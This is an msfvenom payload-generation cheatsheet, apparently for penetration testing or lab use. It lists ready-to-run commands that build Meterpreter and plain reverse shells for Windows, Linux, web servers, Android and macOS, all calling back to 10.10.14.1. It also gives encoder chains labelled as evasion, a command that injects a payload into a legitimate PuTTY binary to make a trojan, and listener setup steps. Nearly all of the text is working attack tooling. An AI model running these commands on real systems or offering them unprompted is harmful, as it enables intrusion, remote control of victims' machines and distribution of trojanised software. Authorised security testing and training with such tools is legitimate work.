MSFVenom — Payload Generation — Cheatsheet

Windows Payloads (6)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell.exe

64-bit Windows Meterpreter EXE

windows exe meterpreter

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell32.exe

32-bit Windows Meterpreter EXE

windows exe x86

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f dll -o shell.dll

Windows DLL payload

windows dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f powershell -o shell.ps1

PowerShell payload

windows powershell

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.1 LPORT=443 -f exe -o shell_https.exe

HTTPS reverse shell (evades inspection)

windows https evasion

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell_plain.exe

Plain Windows reverse shell (no Meterpreter)

windows shell

Linux Payloads (3)

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o shell.elf

64-bit Linux Meterpreter ELF

linux elf meterpreter

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o shell32.elf

32-bit Linux plain shell ELF

linux x86 shell

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o shell64.elf && chmod +x shell64.elf

Linux reverse shell + make executable

linux shell

Web Payloads (5)

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f raw -o shell.php

PHP Meterpreter webshell

php web

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f raw -o shell.jsp

JSP reverse shell (Tomcat/JBoss)

jsp java web

msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f war -o shell.war

WAR file for Java servers

war java tomcat

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f aspx -o shell.aspx

ASPX webshell for IIS

aspx iis web

msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f raw -o shell.py

Python Meterpreter payload

python web

Android & macOS (2)

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -o shell.apk

Android APK Meterpreter payload

android apk mobile

msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f macho -o shell.macho

macOS Meterpreter payload

macos osx

Encoders & Evasion (5)

msfvenom -l encoders

List all available encoders

encoders list

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -e x64/xor_dynamic -i 10 -f exe -o encoded.exe

XOR encode payload 10 times

evasion encode

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f raw | msfvenom -a x64 --platform windows -e x64/xor_dynamic -i 5 -f exe -o double_encoded.exe

Double encode via pipe

evasion encode

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -x /usr/share/windows-binaries/putty.exe -o evil_putty.exe

Inject payload into legitimate binary

evasion trojan

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 --smallest -f exe -o small.exe

Generate smallest possible payload

evasion size

Multi/Handler Listener (3)

use exploit/multi/handler

Set up payload listener in msfconsole

handler listener

set payload windows/x64/meterpreter/reverse_tcp

Set matching payload for handler

handler

set LHOST 10.10.14.1 && set LPORT 4444 && run -j

Start listener as background job

handler background